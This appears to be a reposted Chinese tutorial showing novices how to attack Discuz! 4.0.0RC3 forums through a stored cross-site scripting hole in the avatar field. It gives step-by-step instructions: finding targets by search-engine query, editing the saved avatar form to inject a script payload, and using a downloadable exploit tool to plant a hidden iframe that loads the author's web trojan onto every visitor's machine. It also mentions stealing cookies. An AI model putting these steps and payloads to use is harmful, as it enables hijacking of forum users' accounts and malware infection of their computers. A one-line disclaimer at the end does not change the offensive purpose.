网络通信 频道

黑客入侵实例 记对Discuz论坛的入侵

最近闲来无事的菜鸟们,掀起了一场Discuz论坛,入侵狂潮的“运动”。一时间闹整个安全界也是沸腾不已。不过各站点的站长们身手还算敏捷,低版本Discuz论坛还没用多久,便换上了高版本的论坛(Discuz!4 dot 0.0RC3版本)进行弥补漏洞。但是经过笔者测试成功,得出高级版本的Discuz程序,也是含有跨站入侵的漏洞。只是在方法有些差别而已。下文便是笔者这段时间入侵研究的心得,何不一同来领略一下入侵带来的“快感”!

  一、望穿秋水的“手动”入侵法

  1.首先进入GOOGLE或者百度的搜索站点,在关键字处输入Powered by Discuz! 4.0.0RC3,然后单击 “目标”按钮进入。便可查找出众多使用此版本的论坛地址,这里笔者随意挑选了一个游戏公司的站点作例题讲解。进入游戏公司站点后,单击右上角 “注册”标签,弹出会员用户的注意事项,并且需要等待论坛所设置的阅读时间,然后“单击”下方同意按钮,在注册用户的必填处,填入自己的相关信息,最后单击“提交”按钮,即可成功注册。

  2.会员注册成功以后,自动跳转到论坛首页。在依次进入“控制面板”→“编辑个人资料”。打开“编辑个人资料”标签,单击下方“论坛头像列表”按钮(如图1),会显示出论坛头像中的所有图片。这里笔者随意选择了一个预设的头像图片,并将其页面保存到本地机器中。



图 1

  3.在转到本地机器,以记事本形式打开保存的页面,并单击上方“编辑”标签,选择“查找”选项,弹出查找对话框。在查找文本处输入 “<FORM action=”的字符内容,然后单击目标处“查找下一个”按钮,会在记事本内容下方,选择到所要查找的目标(如图2)。随后在等号后面填入WWW. GU**Y.COM.CN\,来补全提交页面的网址路径。在将其修改过的页面保存,然后在重新打开该页面,并单击 “提交”按钮。这时再回到网站的“控制面板首页”标签栏,查看一下头像是否提交成功。



图 2

  小提示:因保存到本地的头像页面,采用的提交地址是相对路径,所以这里需要补全该站点的网址。否则在提交页面的同时,会显示找不到路径的404错误。如果已经填补了网址路径,并且在本地也成功的将头像提交给了该网站,大家就可以大胆的说明此网站存在头像跨站的漏洞,接下来就可以进行跨站入侵了。

  4.提交头像成功以后,使用DreamWeaver网页设计软件将本地提交的页面打开,然后单击头像一的Radio空间,把选定址处改为“images/avatars/02.gif"><script>alert("曲靖提醒:贵站含有头像跨站漏洞,请采取相关的防御措施!")</script>”的代码字符。在单击“文件”菜单,选择“保存”选项,即可将修改的控件,成功保存。然后在双击打开该页面,选择头像一的单选框,并单击下方“提交”按钮。程序回显会提示:修改成功!同时刷新此页面,弹出笔者所建立的警告对话框(如图3),最后在找个热门的帖子回复一下,只要当用户打开含有笔者的帖子时,都会弹出如图3的警告对话框!



图 3

  小提示:在 “控制面板首页”标签处,查看一下网页代码。只要大家稍有留意,便不难发现调用<img src="http://www.cnpaf.net/Files/BeyondPic/2006-10/11/06101110231158794.gif" width="83" height="94" border="0">的图片地址。调用代码是<img src=“$avatars”字符,所以我们可以构造一个Radio的控件值,来修改的选定值。需要用到DreamWeaver网页设计软件,或其他的网页制作软件来修改,才能自动转义其格式。而不要使用记事本的形式修改相关数值,否则会导致整体内容错乱。

   二、工欲善其事必先利其器

  也许繁琐的手工入侵法,不太适合菜鸟使用。不过没有关系,笔者又为众菜鸟们量身定做了,一套“傻瓜式”入侵套餐。此套餐的宗旨就是让有无基础的菜鸟朋友,都可以按着下文介绍的方法,来入侵高级版本的Discuz论坛。

  前提条件:首先下载Discuz!4.0.0RC3漏洞利用工具(下载地址:http://blog.blackwoods.cn/up/DiscuzExploit.exe),这里下载速度较慢的朋友,不要发愁。该软件已收录到本期配套光盘中,还请读者朋友注意查收一下!

  步骤1.双击下载到桌面的“漏洞利用工具”图标,弹出程序界面(如图4),然后在第二步的文本内容处,敲入手动跨站成功的地址(www. gu**y.com.cn/)。操作完毕后,单击下方“读取参数”按钮,这时需稍等片刻后,才会出现读取成功的对话框(如图5),并单击“确定”按钮即可。



图 4



图 5

  小提示:本文手动入侵和工具入侵,都是采用同一个站点做列题讲解。所以在工具入侵中,有关软件界面提示,第一步需注册站点用户,这里已经在手动入侵中注册完毕,并且已经保存了COOKIES登陆,因此笔者为了避免重复讲解,跳跃了过去。如果您在漏洞站点中,还没有注册过用户的朋友,请先去注册用户,然后在执行步骤1中的方法。

   步骤2.在第三步跨站内容处输入所要插入的恶意代码,如果此时你对代码知识一无所知,可以参考左边代码助手,标签中的三个按钮(如图6)。这里笔者单击“插入IFrame”按钮,会在所需的跨站内容处,出现<iframe src='''' width=0 height=0></iframe>的字符代码。然后在<iframe src的等于后面,填入www.fa***d.com\fda.asp的网址,这是笔者事先制作好的网页后门地址。



图 6

  小提示:代码助手中,“弹出对话框”按钮、“读取COOKIES”按钮以及插入“IFrame”按钮,分别代表当用户浏览过含有自己帖子的同时,1.会弹出如图3的警告对话框。2.得到浏览用户的COOKIES信息。3.在机器中加载网站木马的相关信息。

  步骤3.输入完毕后,其他设置保持默认,然后单击“提交”按钮。执行进度框内,会呈现出写入站点代码的整个过程(如图7)。但是成功与否还需要看见后面的成功提示,方可判断本次写入是否成功,这里笔者等待十秒钟后,弹出了成功的“结论”(如图8)。既然恶意地址写入成功,在漏洞论坛取个诱惑力,较强的标题名称发表,从而让浏览过此帖的用户,都能重上笔者所建立的网页木马。



图 7



图 8

  三、总结

  Discuz!4 dot 0.0RC3版本的头像跨站漏洞,虽然不会危机到整个论坛的安全性能,但是它会牵扯到论坛所用户的电脑安危。小则导致重要信息被窃取,大则电脑摇身变肉鸡!

  注意:本文所介绍的内容,只是告诉大家这种技术,任何人不得利用此技术做非法的事情。

文章转载地址:http://www.cnpaf.net/Class/hack/06101110491277278270.html

0
相关文章